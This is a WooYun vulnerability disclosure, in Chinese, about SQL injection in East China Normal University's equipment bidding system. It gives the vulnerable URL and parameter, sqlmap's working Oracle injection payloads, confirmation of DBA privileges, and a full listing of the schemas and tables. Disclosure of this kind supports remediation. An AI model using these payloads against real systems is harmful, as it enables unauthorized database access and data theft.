当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158640

漏洞标题:华东师范大学某系统SQL注入#DBA权限#获取sql-shell

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-12-07 12:40

修复时间:2016-01-21 14:10

公开时间:2016-01-21 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

如题

详细说明:

看到漏洞有这个网站的、但搜了一下关键字、没搜到应该是没提交过的
0x01 漏洞位置

华东师范大学设备竞价系统


0x02 漏洞具体

http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1


0x03 漏洞利用方式

sqlmap

漏洞证明:

0x04 漏洞证明

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WID
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: WID=1' AND 1357=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1357=1357) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113)) AND 'VMng'='VMng
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: WID=1' UNION ALL SELECT NULL,CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||CHR(103)||CHR(68)||CHR(81)||CHR(71)||CHR(97)||CHR(73)||CHR(82)||CHR(106)||CHR(103)||CHR(81)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113),NULL FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: WID=1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(116)||CHR(114)||CHR(98),5) AND 'FeZB'='FeZB
---
[13:47:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


发现是DBA权限

[13:44:57] [INFO] testing if current user is DBA
[13:44:57] [WARNING] reflective value(s) found and filtering out
current user is DBA:    True


数据库全部信息

available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HSD_ZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZC
[*] ZC20110430
[*] ZC20140731
[*] ZC_TEST
[*] ZCTEST


表信息

Database: ZC
[320 tables]
+--------------------+
| AQCHEN_338         |
| AQCHEN_GXJJ_YQDC   |
| AQCHEN_ORG01       |
| AQCHEN_T_SB        |
| A_TMP_BH           |
| E$_ZC_BM_TEMP      |
| E$_ZC_JFB_TEMP     |
| E$_ZC_JFKMYE_TEMP  |
| E$_ZC_YH_TEMP      |
| I$_ZC_BM_TEMP_LOG  |
| I$_ZC_JFB_TEMP_LOG |
| I$_ZC_YH_TEMP_LOG  |
| PLAN_TABLE         |
| RY                 |
| RYLX               |
| SNP_CHECK_TAB      |
| SYS_KFRWGL         |
| SYS_RYGL           |
| T_JCSJ_DM          |
| T_XTGL_SJB         |
| T_XTGL_SJBZD       |
| XLLX               |
| ZCLX               |
| ZC_AZDD            |
| ZC_BDLX            |
| ZC_BDSQBDYY        |
| ZC_BDSQD           |
| ZC_BDSQKP          |
| ZC_BDSQLB          |
| ZC_BDXZ            |
| ZC_BFPC            |
| ZC_BH2SYS_DW       |
| ZC_BH2SYS_KCK      |
| ZC_BH2SYS_RY       |
| ZC_BH2SYS_SJ6      |
| ZC_BH2SYS_SJ7      |
| ZC_BH2SYS_SYMC     |
| ZC_BH2SYS_SYXM     |
| ZC_BHDZ_BDK        |
| ZC_BHDZ_ZJK        |
| ZC_BHJJ_BDK        |
| ZC_BHJJ_ZJK        |
| ZC_BHSB_BDK        |
| ZC_BHSB_FJK        |
| ZC_BHSB_ZJK        |
| ZC_BLZT            |
| ZC_BLZTPZ          |
| ZC_BM              |
| ZC_BMNDJC          |
| ZC_BMNDJCCXTJ      |
| ZC_BM_20151019     |
| ZC_BM_TEMP         |
| ZC_BZD             |
| ZC_BZDJFLY         |
| ZC_BZDMS           |
| ZC_BZDPTCX         |
| ZC_BZDPZ           |
| ZC_CWRECORD_TEMP   |
| ZC_CWZJDJD         |
| ZC_CZBMBPZ         |
| ZC_CZBZCDL         |
| ZC_CZBZCFL         |
| ZC_DMZHB           |
| ZC_DQKPXX          |
| ZC_DQKPXXM200912   |
| ZC_DQKPXXM201012   |
| ZC_DQKPXXM201112   |
| ZC_DQKPXXM201208   |
| ZC_DQKPXXM201212   |
| ZC_DQKPXXM201308   |
| ZC_DQKPXXM201312   |
| ZC_DQKPXXM201408   |
| ZC_DQKPXXM201412   |
| ZC_DQKPXXM201508   |
| ZC_DXQY_GG         |
| ZC_DXYQDWFW        |
| ZC_DXYQJZRY        |
| ZC_DXYQXX          |
| ZC_DXYQ_CEJL       |
| ZC_DXYQ_CEPJ       |
| ZC_DXYQ_DJCSCSSJ   |
| ZC_DXYQ_FL         |
| ZC_DXYQ_FMZL       |
| ZC_DXYQ_HJQK       |
| ZC_DXYQ_KFSJD      |
| ZC_DXYQ_KFSJDFA    |
| ZC_DXYQ_KJCG       |
| ZC_DXYQ_LWQK       |
| ZC_DXYQ_NDKHB      |
| ZC_DXYQ_PXQK       |
| ZC_DXYQ_RJH        |
| ZC_DXYQ_SC         |
| ZC_DXYQ_YJH        |
| ZC_DXYQ_YYD        |
| ZC_DXYQ_YYDDCYP    |
| ZC_DXYQ_YYDYYSJ    |
| ZC_DXYQ_YYZTXGJL   |
| ZC_DXYQ_ZJH        |
| ZC_DXYQ_ZJHMX      |
| ZC_EXPORTLIST      |
| ZC_FCBZ            |
| ZC_FCBZPZ          |
| ZC_FCMJ            |
| ZC_FCPZ            |
| ZC_FCPZBZ          |
| ZC_FCPZDL          |
| ZC_FCPZXL          |
| ZC_FIELDOFTABLE    |
| ZC_FJ              |
| ZC_FJJY            |
| ZC_FJJYKP          |
| ZC_FJJYSQ          |
| ZC_FJJYSQKP        |
| ZC_FJSY            |
| ZC_GBZCDL          |
| ZC_GBZCFL          |
| ZC_GGDMCXTJ        |
| ZC_GJDL            |
| ZC_GJXL            |
| ZC_GNCD            |
| ZC_HMDYH           |
| ZC_JFB             |
| ZC_JFB_TEMP        |
| ZC_JFFP            |
| ZC_JFKMYE          |
| ZC_JFKMYE_TEMP     |
| ZC_JFLY            |
| ZC_JFYS            |
| ZC_JFYSLS          |
| ZC_JFZD            |
| ZC_JFZKK           |
| ZC_JFZL            |
| ZC_JGYQSYXY        |
| ZC_JKDJB           |
| ZC_JKDLGS          |
| ZC_JKSBBLQK        |
| ZC_JS              |
| ZC_JSGNQX          |
| ZC_JWZCFL          |
| ZC_JYJL            |
| ZC_JYSQD           |
| ZC_KPBDXX          |
| ZC_KPMS            |
| ZC_KPPZ            |
| ZC_KPTJBB          |
| ZC_KPTJBBCX        |
| ZC_KPXX            |
| ZC_KPXX_QCPC       |
| ZC_KPXX_SJTXJD     |
| ZC_LC              |
| ZC_LCJD            |
| ZC_LSBZD           |
| ZC_LSBZDJFLY       |
| ZC_LSJFLY          |
| ZC_LSKPXX          |
| ZC_LSSGD           |
| ZC_LSSGDJFLY       |
| ZC_PDHZB           |
| ZC_PDJL            |
| ZC_PDSJLSB         |
| ZC_PEDL            |
| ZC_PEPZ            |
| ZC_PETJ            |
| ZC_PEXL            |
| ZC_PJJB            |
| ZC_QCPKB           |
| ZC_QCPYB           |
| ZC_QCSBPZB         |
| ZC_QXCXTJ          |
| ZC_RWCX            |
| ZC_RWSJ            |
| ZC_RWSJX           |
| ZC_RWZX            |
| ZC_RWZXBM          |
| ZC_RWZXJD          |
| ZC_RY              |
| ZC_RYLX            |
| ZC_SBBB            |
| ZC_SBBBCXTJ        |
| ZC_SBBBPZ          |
| ZC_SBBBZT          |
| ZC_SBBDXZ          |
| ZC_SBBDYY          |
| ZC_SBD             |
| ZC_SBKP            |
| ZC_SBQG            |
| ZC_SBSJTXJD        |
| ZC_SGCYWP          |
| ZC_SGD             |
| ZC_SGDCGY          |
| ZC_SGDJFLY         |
| ZC_SGDMS           |
| ZC_SGDPZ           |
| ZC_SGHT            |
| ZC_SGHTFKQK        |
| ZC_SGHTJFLY        |
| ZC_SGHTPZ          |
| ZC_SGHTXGSGD       |
| ZC_SGSCDY          |
| ZC_SGZB            |
| ZC_SGZBFB          |
| ZC_SGZBJJD         |
| ZC_SGZBJJDMX       |
| ZC_SGZBXGSGD       |
| ZC_SGZBXGSGD_LSB   |
| ZC_SGZBXGSGD_XG    |
| ZC_SGZB_BLQK       |
| ZC_SGZB_CGPS       |
| ZC_SGZB_JDLB       |
| ZC_SGZB_JG         |
| ZC_SGZB_PBJDZ      |
| ZC_SGZB_PBMXXX     |
| ZC_SGZB_PBZJ       |
| ZC_SGZB_PBZJZ      |
| ZC_SGZB_PBZJ_CGXM  |
| ZC_SGZB_PBZJ_ZZLW  |
| ZC_SGZB_PFB        |
| ZC_SGZB_PFBF       |
| ZC_SGZB_PFFA       |
| ZC_SGZB_PFFA_PFBF  |
| ZC_SGZB_TBXX       |
| ZC_SGZB_ZHDFB      |
| ZC_SHZCFL          |
| ZC_SJDX            |
| ZC_SJSJRW          |
| ZC_SJZD            |
| ZC_SJZDBM          |
| ZC_SYSGLCXTJ       |
| ZC_SYSGLSJ         |
| ZC_SYSGLSJMS       |
| ZC_SYSKP           |
| ZC_SYSKPMS         |
| ZC_SYSKPZX         |
| ZC_TJBBPZCS        |
| ZC_TSHJY           |
| ZC_TYBMS           |
| ZC_WPCK            |
| ZC_WPCKD           |
| ZC_WPCKDMX         |
| ZC_WPFKDJD         |
| ZC_WPFKLYSQD       |
| ZC_WPFL            |
| ZC_WPFL_TEMP       |
| ZC_WPGYDW          |
| ZC_WPKC            |
| ZC_WPLYSQD         |
| ZC_WPLYSQDMX       |
| ZC_WPRKD           |
| ZC_WPRKDMX         |
| ZC_WPRKSQD         |
| ZC_WPRKSQDMX       |
| ZC_WPSYDJD         |
| ZC_WPXX            |
| ZC_WPXX_IMP        |
| ZC_WPYDJC          |
| ZC_WPYDJCMX        |
| ZC_WXJL            |
| ZC_WXJLKP          |
| ZC_WXJLMX          |
| ZC_WXSQD           |
| ZC_XLLX            |
| ZC_XQ              |
| ZC_XTCS            |
| ZC_XTCS_CLOB       |
| ZC_XTGG            |
| ZC_XTGGCX          |
| ZC_XTGGLM          |
| ZC_XTRZ            |
| ZC_XTRZ_HISTORY    |
| ZC_XTRZ_OPERATE    |
| ZC_XTRZ_PZXX       |
| ZC_XX              |
| ZC_XXBMBM          |
| ZC_XXTZ            |
| ZC_XXTZ_LS         |
| ZC_YH              |
| ZC_YHBBQX          |
| ZC_YHBMQX          |
| ZC_YHBMQXCX        |
| ZC_YHXQQX          |
| ZC_YHZ             |
| ZC_YHZCLXQX        |
| ZC_YHZSHJS         |
| ZC_YH_TEMP         |
| ZC_YQLJ            |
| ZC_YSTZ            |
| ZC_YSXX            |
| ZC_YSXXZQTZ        |
| ZC_YSZT            |
| ZC_YW              |
| ZC_YWBM_SPBEAN     |
| ZC_YWDBR           |
| ZC_YWDBRSZLOG      |
| ZC_YWFJ            |
| ZC_YWFJFL          |
| ZC_YWFL_BLOB       |
| ZC_YWLZ            |
| ZC_YWLZGJDCLR      |
| ZC_YWLZRZ          |
| ZC_YWMXXMCLQK      |
| ZC_YXBM            |
| ZC_YXJFLY          |
| ZC_ZC              |
| ZC_ZCBZCXTJ        |
| ZC_ZCDL            |
| ZC_ZCDLJGXZ        |
| ZC_ZCFL            |
| ZC_ZCFL1           |
| ZC_ZCGYS           |
| ZC_ZCGYSNS         |
| ZC_ZCGYSPJ         |
| ZC_ZCLX            |
| ZC_ZCPTYH          |
| ZC_ZCSX            |
| ZC_ZDPZ            |
| ZC_ZFBKD           |
| ZC_ZFJFB           |
| ZC_ZFPZ            |
| ZWLX               |
| ZWLX2              |
+--------------------+


获取sql-shell

7N%~)9RN3_{H(4HXP0WS$ZL.png

修复方案:

我觉得该换系统了

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-07 14:07

厂商回复:

通知二级单位处理。

最新状态:

暂无